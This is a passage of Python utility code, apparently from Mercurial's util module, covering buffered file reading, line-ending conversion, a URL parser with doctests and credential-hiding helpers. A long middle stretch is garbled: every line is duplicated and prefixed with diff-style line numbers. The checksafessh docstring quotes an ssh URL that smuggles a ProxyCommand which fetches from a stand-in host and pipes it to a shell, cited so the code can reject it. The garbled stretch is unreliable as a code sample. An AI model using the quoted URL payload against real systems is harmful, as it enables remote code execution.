    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        if err.errno == errno.EEXIST:
            return
        if err.errno != errno.ENOENT or not name:
            raise
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as err:
            # Catch EEXIST to handle races
            if err.errno == errno.EEXIST:
                return
            raise
    if mode is not None:
        os.chmod(name, mode)

def readfile(path):
    with open(path, 'rb') as fp:
        return fp.read()

def writefile(path, text):
    with open(path, 'wb') as fp:
        fp.write(text)

def appendfile(path, text):
    with open(path, 'ab') as fp:
        fp.write(text)

class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""
        def splitbig(chunks):
            for chunk in chunks:
                if len(chunk) > 2**20:
                    pos = 0
                    while pos < len(chunk):
                        end = pos + 2 ** 18
                        yield chunk[pos:end]
                        pos = end
                else:
                    yield chunk
        self.iter = splitbig(in_iter)
        self._queue = collections.deque()
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

        If the size parameter is omitted, read everything."""
        if l is None:
            return ''.join(self.iter)

        left = l
        buf = []
        queue = self._queue
        while left > 0:
            # refill the queue
            if not queue:
                target = 2**18
                for chunk in self.iter:
                    queue.append(chunk)
                    target -= len(chunk)
                    if target <= 0:
                        break
                if not queue:
                    break

            # The easy way to do this would be to queue.popleft(), modify the
            # chunk (if necessary), then queue.appendleft(). However, for cases
            # where we read partial chunk content, this incurs 2 dequeue
            # mutations and creates a new str for the remaining chunk in the
            # queue. Our code below avoids this overhead.

            chunk = queue[0]
            chunkl = len(chunk)
            offset = self._chunkoffset

            # Use full chunk.
            if offset == 0 and left >= chunkl:
                left -= chunkl
                queue.popleft()
                buf.append(chunk)
                # self._chunkoffset remains at 0.
                continue

            chunkremaining = chunkl - offset

            # Use all of the unconsumed part of the chunk.
            if left >= chunkremaining:
                left -= chunkremaining
                queue.popleft()
                # offset == 0 is enabled by the block above, so this won't
                # merely copy via ``chunk[0:]``.
                buf.append(chunk[offset:])
                self._chunkoffset = 0

            # Partial chunk needed.
            else:
                buf.append(chunk[offset:offset + left])
                self._chunkoffset += left
                left -= chunkremaining

        return ''.join(buf)

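# Editor's note: illustrative sketch, not part of the original module.
# chunkbuffer turns an iterator of arbitrarily sized chunks into a
# file-like object supporting fixed-size reads across chunk boundaries:
def _example_chunkbuffer():
    buf = chunkbuffer([b'abc', b'defg', b'h'])
    assert buf.read(4) == b'abcd'
    assert buf.read(4) == b'efgh'
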
def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file, size
    (default 131072) bytes at a time, up to optional limit (default is
    to read all data). Chunks may be less than size bytes if the
    chunk is the last chunk in the file, or the file is a socket or
    some other type of file that sometimes reads less data than is
    requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        if limit is None:
            nbytes = size
        else:
            nbytes = min(limit, size)
        s = nbytes and f.read(nbytes)
        if not s:
            break
        if limit:
            limit -= len(s)
        yield s

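# Editor's note: illustrative sketch, not part of the original module.
# filechunkiter() lets a caller stream a large file without holding it
# in memory all at once, e.g. to total its size:
def _example_filesize(path):
    total = 0
    with open(path, 'rb') as fp:
        for chunk in filechunkiter(fp, size=65536):
            total += len(chunk)
    return total
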
class cappedreader(object):
    """A file object proxy that allows reading up to N bytes.

    Given a source file object, instances of this type allow reading up to
    N bytes from that source file object. Attempts to read past the allowed
    limit are treated as EOF.

    It is assumed that I/O is not performed on the original file object
    in addition to I/O that is performed by this instance. If there is,
    state tracking will get out of sync and unexpected results will ensue.
    """
    def __init__(self, fh, limit):
        """Allow reading up to <limit> bytes from <fh>."""
        self._fh = fh
        self._left = limit

    def read(self, n=-1):
        if not self._left:
            return b''

        if n < 0:
            n = self._left

        data = self._fh.read(min(n, self._left))
        self._left -= len(data)
        assert self._left >= 0

        return data

    def readinto(self, b):
        res = self.read(len(b))
        if res is None:
            return None

        b[0:len(res)] = res
        return len(res)

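# Editor's note: illustrative sketch, not part of the original module
# (the 'io' import is local to the example). Reads beyond the cap are
# treated as EOF, per the docstring above:
def _example_cappedreader():
    import io
    reader = cappedreader(io.BytesIO(b'0123456789'), 4)
    assert reader.read() == b'0123'
    assert reader.read() == b''
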
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity'''

    def go(count):
        for multiplier, divisor, format in unittable:
            if abs(count) >= divisor * multiplier:
                return format % (count / float(divisor))
        return unittable[-1][2] % count

    return go

def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
        ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
        ...
    ParseError: fromline must be strictly positive
    """
    if toline - fromline < 0:
        raise error.ParseError(_("line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    return fromline - 1, toline

bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )

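# Editor's note: illustrative sketch, not part of the original module.
# unitcountfn() builds a formatter from (multiplier, divisor, format)
# rows; bytecount above is one instance. A hypothetical time formatter:
_example_timecount = unitcountfn(
    (1, 3600, '%.1f hours'),
    (1, 60, '%.1f minutes'),
    (1, 1, '%.0f seconds'),
    )
# _example_timecount(5400) -> '1.5 hours'; _example_timecount(30) -> '30 seconds'
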
class transformingwriter(object):
    """Writable file wrapper to transform data by function"""

    def __init__(self, fp, encode):
        self._fp = fp
        self._encode = encode

    def close(self):
        self._fp.close()

    def flush(self):
        self._fp.flush()

    def write(self, data):
        return self._fp.write(self._encode(data))

# Matches a single EOL which can either be a CRLF where repeated CR
# are removed or a LF. We do not care about old Macintosh files, so a
# stray CR is an error.
_eolre = remod.compile(br'\r*\n')

def tolf(s):
    return _eolre.sub('\n', s)

def tocrlf(s):
    return _eolre.sub('\r\n', s)

def _crlfwriter(fp):
    return transformingwriter(fp, tocrlf)

if pycompat.oslinesep == '\r\n':
    tonativeeol = tocrlf
    fromnativeeol = tolf
    nativeeolwriter = _crlfwriter
else:
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
    nativeeolwriter = pycompat.identity

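# Editor's note: illustrative sketch, not part of the original module.
# Per the _eolre comment above, any run of CRs followed by LF collapses
# to a single newline on the way in, and expands to CRLF if requested:
def _example_eolconversion():
    assert tolf(b'a\r\nb\r\r\n') == b'a\nb\n'
    assert tocrlf(b'a\nb\n') == b'a\r\nb\r\n'
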
if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #                | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy   | buggy           | okay
    #    fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            fd = fp.fileno()
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            line = l
                if not buf:
                    break
            if line:
                yield line

    def iterfile(fp):
        fastpath = True
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        return fp

def iterlines(iterator):
    for chunk in iterator:
        for line in chunk.splitlines():
            yield line

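# Editor's note: illustrative sketch, not part of the original module.
# iterlines() splits each chunk independently and drops line endings;
# note that it does not stitch together a line that straddles a chunk
# boundary:
def _example_iterlines():
    assert list(iterlines([b'a\nb', b'c\nd\n'])) == [b'a', b'b', b'c', b'd']
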
def expandpath(path):
    return os.path.expanduser(os.path.expandvars(path))

def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using a doubled prefix
    as its own escape.
    """
    fn = fn or (lambda s: s)
    patterns = '|'.join(mapping.keys())
    if escape_prefix:
        patterns += '|' + prefix
        if len(prefix) > 1:
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        mapping[prefix_char] = prefix_char
    r = remod.compile(br'%s(%s)' % (prefix, patterns))
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)

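# Editor's note: illustrative sketch, not part of the original module,
# using a hypothetical mapping and the plain (regex-safe) prefix '%':
def _example_interpolate():
    mapping = {'a': 'apple', 'b': 'banana'}
    # returns 'eat an apple or a banana'
    return interpolate('%', mapping, 'eat an %a or a %b')
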
2607 def getport(port):
2617 def getport(port):
2608 """Return the port for a given network service.
2618 """Return the port for a given network service.
2609
2619
2610 If port is an integer, it's returned as is. If it's a string, it's
2620 If port is an integer, it's returned as is. If it's a string, it's
2611 looked up using socket.getservbyname(). If there's no matching
2621 looked up using socket.getservbyname(). If there's no matching
2612 service, error.Abort is raised.
2622 service, error.Abort is raised.
2613 """
2623 """
2614 try:
2624 try:
2615 return int(port)
2625 return int(port)
2616 except ValueError:
2626 except ValueError:
2617 pass
2627 pass
2618
2628
2619 try:
2629 try:
2620 return socket.getservbyname(pycompat.sysstr(port))
2630 return socket.getservbyname(pycompat.sysstr(port))
2621 except socket.error:
2631 except socket.error:
2622 raise error.Abort(_("no port number associated with service '%s'")
2632 raise error.Abort(_("no port number associated with service '%s'")
2623 % port)
2633 % port)
2624
2634
2625 class url(object):
2635 class url(object):
2626 r"""Reliable URL parser.
2636 r"""Reliable URL parser.
2627
2637
2628 This parses URLs and provides attributes for the following
2638 This parses URLs and provides attributes for the following
2629 components:
2639 components:
2630
2640
2631 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2641 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2632
2642
2633 Missing components are set to None. The only exception is
2643 Missing components are set to None. The only exception is
2634 fragment, which is set to '' if present but empty.
2644 fragment, which is set to '' if present but empty.
2635
2645
2636 If parsefragment is False, fragment is included in query. If
2646 If parsefragment is False, fragment is included in query. If
2637 parsequery is False, query is included in path. If both are
2647 parsequery is False, query is included in path. If both are
2638 False, both fragment and query are included in path.
2648 False, both fragment and query are included in path.
2639
2649
2640 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2650 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2641
2651
2642 Note that for backward compatibility reasons, bundle URLs do not
2652 Note that for backward compatibility reasons, bundle URLs do not
2643 take host names. That means 'bundle://../' has a path of '../'.
2653 take host names. That means 'bundle://../' has a path of '../'.
2644
2654
2645 Examples:
2655 Examples:
2646
2656
2647 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2657 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2648 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2658 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2649 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2659 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2650 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2660 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2651 >>> url(b'file:///home/joe/repo')
2661 >>> url(b'file:///home/joe/repo')
2652 <url scheme: 'file', path: '/home/joe/repo'>
2662 <url scheme: 'file', path: '/home/joe/repo'>
2653 >>> url(b'file:///c:/temp/foo/')
2663 >>> url(b'file:///c:/temp/foo/')
2654 <url scheme: 'file', path: 'c:/temp/foo/'>
2664 <url scheme: 'file', path: 'c:/temp/foo/'>
2655 >>> url(b'bundle:foo')
2665 >>> url(b'bundle:foo')
2656 <url scheme: 'bundle', path: 'foo'>
2666 <url scheme: 'bundle', path: 'foo'>
2657 >>> url(b'bundle://../foo')
2667 >>> url(b'bundle://../foo')
2658 <url scheme: 'bundle', path: '../foo'>
2668 <url scheme: 'bundle', path: '../foo'>
2659 >>> url(br'c:\foo\bar')
2669 >>> url(br'c:\foo\bar')
2660 <url path: 'c:\\foo\\bar'>
2670 <url path: 'c:\\foo\\bar'>
2661 >>> url(br'\\blah\blah\blah')
2671 >>> url(br'\\blah\blah\blah')
2662 <url path: '\\\\blah\\blah\\blah'>
2672 <url path: '\\\\blah\\blah\\blah'>
2663 >>> url(br'\\blah\blah\blah#baz')
2673 >>> url(br'\\blah\blah\blah#baz')
2664 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2674 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2665 >>> url(br'file:///C:\users\me')
2675 >>> url(br'file:///C:\users\me')
2666 <url scheme: 'file', path: 'C:\\users\\me'>
2676 <url scheme: 'file', path: 'C:\\users\\me'>
2667
2677
2668 Authentication credentials:
2678 Authentication credentials:
2669
2679
2670 >>> url(b'ssh://joe:xyz@x/repo')
2680 >>> url(b'ssh://joe:xyz@x/repo')
2671 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2681 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2672 >>> url(b'ssh://joe@x/repo')
2682 >>> url(b'ssh://joe@x/repo')
2673 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2683 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2674
2684
2675 Query strings and fragments:
2685 Query strings and fragments:
2676
2686
2677 >>> url(b'http://host/a?b#c')
2687 >>> url(b'http://host/a?b#c')
2678 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2688 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2679 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2689 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2680 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2690 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2681
2691
2682 Empty path:
2692 Empty path:
2683
2693
2684 >>> url(b'')
2694 >>> url(b'')
2685 <url path: ''>
2695 <url path: ''>
2686 >>> url(b'#a')
2696 >>> url(b'#a')
2687 <url path: '', fragment: 'a'>
2697 <url path: '', fragment: 'a'>
2688 >>> url(b'http://host/')
2698 >>> url(b'http://host/')
2689 <url scheme: 'http', host: 'host', path: ''>
2699 <url scheme: 'http', host: 'host', path: ''>
2690 >>> url(b'http://host/#a')
2700 >>> url(b'http://host/#a')
2691 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2701 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2692
2702
2693 Only scheme:
2703 Only scheme:
2694
2704
2695 >>> url(b'http:')
2705 >>> url(b'http:')
2696 <url scheme: 'http'>
2706 <url scheme: 'http'>
2697 """
2707 """
2698
2708
2699 _safechars = "!~*'()+"
2709 _safechars = "!~*'()+"
2700 _safepchars = "/!~*'()+:\\"
2710 _safepchars = "/!~*'()+:\\"
2701 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2711 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2702
2712
2703 def __init__(self, path, parsequery=True, parsefragment=True):
2713 def __init__(self, path, parsequery=True, parsefragment=True):
2704 # We slowly chomp away at path until we have only the path left
2714 # We slowly chomp away at path until we have only the path left
2705 self.scheme = self.user = self.passwd = self.host = None
2715 self.scheme = self.user = self.passwd = self.host = None
2706 self.port = self.path = self.query = self.fragment = None
2716 self.port = self.path = self.query = self.fragment = None
2707 self._localpath = True
2717 self._localpath = True
2708 self._hostport = ''
2718 self._hostport = ''
2709 self._origpath = path
2719 self._origpath = path
2710
2720
2711 if parsefragment and '#' in path:
2721 if parsefragment and '#' in path:
2712 path, self.fragment = path.split('#', 1)
2722 path, self.fragment = path.split('#', 1)
2713
2723
2714 # special case for Windows drive letters and UNC paths
2724 # special case for Windows drive letters and UNC paths
2715 if hasdriveletter(path) or path.startswith('\\\\'):
2725 if hasdriveletter(path) or path.startswith('\\\\'):
2716 self.path = path
2726 self.path = path
2717 return
2727 return
2718
2728
2719 # For compatibility reasons, we can't handle bundle paths as
2729 # For compatibility reasons, we can't handle bundle paths as
2720 # normal URLS
2730 # normal URLS
2721 if path.startswith('bundle:'):
2731 if path.startswith('bundle:'):
2722 self.scheme = 'bundle'
2732 self.scheme = 'bundle'
2723 path = path[7:]
2733 path = path[7:]
2724 if path.startswith('//'):
2734 if path.startswith('//'):
2725 path = path[2:]
2735 path = path[2:]
2726 self.path = path
2736 self.path = path
2727 return
2737 return
2728
2738
2729 if self._matchscheme(path):
2739 if self._matchscheme(path):
2730 parts = path.split(':', 1)
2740 parts = path.split(':', 1)
2731 if parts[0]:
2741 if parts[0]:
2732 self.scheme, path = parts
2742 self.scheme, path = parts
2733 self._localpath = False
2743 self._localpath = False
2734
2744
2735 if not path:
2745 if not path:
2736 path = None
2746 path = None
2737 if self._localpath:
2747 if self._localpath:
2738 self.path = ''
2748 self.path = ''
2739 return
2749 return
2740 else:
2750 else:
2741 if self._localpath:
2751 if self._localpath:
2742 self.path = path
2752 self.path = path
2743 return
2753 return
2744
2754
2745 if parsequery and '?' in path:
2755 if parsequery and '?' in path:
2746 path, self.query = path.split('?', 1)
2756 path, self.query = path.split('?', 1)
2747 if not path:
2757 if not path:
2748 path = None
2758 path = None
2749 if not self.query:
2759 if not self.query:
2750 self.query = None
2760 self.query = None
2751
2761
2752 # // is required to specify a host/authority
2762 # // is required to specify a host/authority
2753 if path and path.startswith('//'):
2763 if path and path.startswith('//'):
2754 parts = path[2:].split('/', 1)
2764 parts = path[2:].split('/', 1)
2755 if len(parts) > 1:
2765 if len(parts) > 1:
2756 self.host, path = parts
2766 self.host, path = parts
2757 else:
2767 else:
2758 self.host = parts[0]
2768 self.host = parts[0]
2759 path = None
2769 path = None
2760 if not self.host:
2770 if not self.host:
2761 self.host = None
2771 self.host = None
2762 # path of file:///d is /d
2772 # path of file:///d is /d
2763 # path of file:///d:/ is d:/, not /d:/
2773 # path of file:///d:/ is d:/, not /d:/
2764 if path and not hasdriveletter(path):
2774 if path and not hasdriveletter(path):
2765 path = '/' + path
2775 path = '/' + path
2766
2776
2767 if self.host and '@' in self.host:
2777 if self.host and '@' in self.host:
2768 self.user, self.host = self.host.rsplit('@', 1)
2778 self.user, self.host = self.host.rsplit('@', 1)
2769 if ':' in self.user:
2779 if ':' in self.user:
2770 self.user, self.passwd = self.user.split(':', 1)
2780 self.user, self.passwd = self.user.split(':', 1)
2771 if not self.host:
2781 if not self.host:
2772 self.host = None
2782 self.host = None
2773
2783
2774 # Don't split on colons in IPv6 addresses without ports
2784 # Don't split on colons in IPv6 addresses without ports
2775 if (self.host and ':' in self.host and
2785 if (self.host and ':' in self.host and
2776 not (self.host.startswith('[') and self.host.endswith(']'))):
2786 not (self.host.startswith('[') and self.host.endswith(']'))):
2777 self._hostport = self.host
2787 self._hostport = self.host
2778 self.host, self.port = self.host.rsplit(':', 1)
2788 self.host, self.port = self.host.rsplit(':', 1)
2779 if not self.host:
2789 if not self.host:
2780 self.host = None
2790 self.host = None
2781
2791
2782 if (self.host and self.scheme == 'file' and
2792 if (self.host and self.scheme == 'file' and
2783 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2793 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2784 raise error.Abort(_('file:// URLs can only refer to localhost'))
2794 raise error.Abort(_('file:// URLs can only refer to localhost'))
2785
2795
2786 self.path = path
2796 self.path = path
2787
2797
2788 # leave the query string escaped
2798 # leave the query string escaped
2789 for a in ('user', 'passwd', 'host', 'port',
2799 for a in ('user', 'passwd', 'host', 'port',
2790 'path', 'fragment'):
2800 'path', 'fragment'):
2791 v = getattr(self, a)
2801 v = getattr(self, a)
2792 if v is not None:
2802 if v is not None:
2793 setattr(self, a, urlreq.unquote(v))
2803 setattr(self, a, urlreq.unquote(v))
2794
2804
2795 @encoding.strmethod
2805 @encoding.strmethod
2796 def __repr__(self):
2806 def __repr__(self):
2797 attrs = []
2807 attrs = []
2798 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2808 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2799 'query', 'fragment'):
2809 'query', 'fragment'):
2800 v = getattr(self, a)
2810 v = getattr(self, a)
2801 if v is not None:
2811 if v is not None:
2802 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2812 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2803 return '<url %s>' % ', '.join(attrs)
2813 return '<url %s>' % ', '.join(attrs)
2804
2814
2805 def __bytes__(self):
2815 def __bytes__(self):
2806 r"""Join the URL's components back into a URL string.
2816 r"""Join the URL's components back into a URL string.
2807
2817
2808 Examples:
2818 Examples:
2809
2819
2810 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2820 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2811 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2821 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2812 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2822 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2813 'http://user:pw@host:80/?foo=bar&baz=42'
2823 'http://user:pw@host:80/?foo=bar&baz=42'
2814 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2824 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2815 'http://user:pw@host:80/?foo=bar%3dbaz'
2825 'http://user:pw@host:80/?foo=bar%3dbaz'
2816 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2826 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2817 'ssh://user:pw@[::1]:2200//home/joe#'
2827 'ssh://user:pw@[::1]:2200//home/joe#'
2818 >>> bytes(url(b'http://localhost:80//'))
2828 >>> bytes(url(b'http://localhost:80//'))
2819 'http://localhost:80//'
2829 'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            s += '//'
            if hasdriveletter(self.path):
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        user, passwd = self.user, self.passwd
        try:
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host),
                    self.user, self.passwd or ''))

    def isabs(self):
        if self.scheme and self.scheme != 'file':
            return True # remote URL
        if hasdriveletter(self.path):
            return True # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True # Windows UNC path
        if self.path.startswith('/'):
            return True # POSIX-style
        return False

    def localpath(self):
        if self.scheme == 'file' or self.scheme == 'bundle':
            path = self.path or '/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + '/' + self.path
            elif (self.host is not None and self.path
                  and not hasdriveletter(path)):
                path = '/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (not self.scheme or self.scheme == 'file'
                or self.scheme == 'bundle')

def hasscheme(path):
    return bool(url(path).scheme)

def hasdriveletter(path):
    return path and path[1:2] == ':' and path[0:1].isalpha()

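# Illustrative sketch (not part of the original module): hasdriveletter()
# only checks for the "<letter>:" shape at the start of the path, so, under
# this module's bytes-literal conventions:
#
#   hasdriveletter(b'c:/tmp/foo')     # -> truthy (b'c' is alpha, b':' follows)
#   hasdriveletter(b'http://host/x')  # -> falsy (second byte is b't', not b':')
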
def urllocalpath(path):
    return url(path, parsequery=False, parsefragment=False).localpath()

def checksafessh(path):
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploitable urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    path = urlreq.unquote(path)
    if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
        raise error.Abort(_('potentially unsafe url: %r') %
                          (pycompat.bytestr(path),))

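# Illustrative sketch (not part of the original module): a host beginning
# with '-' would otherwise reach ssh as a command line option.
#
#   checksafessh(b'ssh://-oProxyCommand=evil/path')  # raises error.Abort
#   checksafessh(b'ssh://example.com/repo')          # returns quietly
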
def hidepassword(u):
    '''hide user credential in a url string'''
    u = url(u)
    if u.passwd:
        u.passwd = '***'
    return bytes(u)

def removeauth(u):
    '''remove all authentication information from a url string'''
    u = url(u)
    u.user = u.passwd = None
    return bytes(u)

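# Illustrative sketch (not part of the original module):
#
#   hidepassword(b'http://alice:secret@example.com/repo')
#   # -> 'http://alice:***@example.com/repo'
#   removeauth(b'http://alice:secret@example.com/repo')
#   # -> 'http://example.com/repo'
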
timecount = unitcountfn(
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
    )

@attr.s
class timedcmstats(object):
    """Stats information produced by the timedcm context manager on entering."""

    # the starting value of the timer as a float (meaning and resolution are
    # platform dependent, see util.timer)
    start = attr.ib(default=attr.Factory(lambda: timer()))
    # the number of seconds as a floating point value; starts at 0, updated when
    # the context is exited.
    elapsed = attr.ib(default=0)
    # the number of nested timedcm context managers.
    level = attr.ib(default=1)

    def __bytes__(self):
        return timecount(self.elapsed) if self.elapsed else '<unknown>'

    __str__ = encoding.strmethod(__bytes__)

@contextlib.contextmanager
def timedcm(whencefmt, *whenceargs):
    """A context manager that produces timing information for a given context.

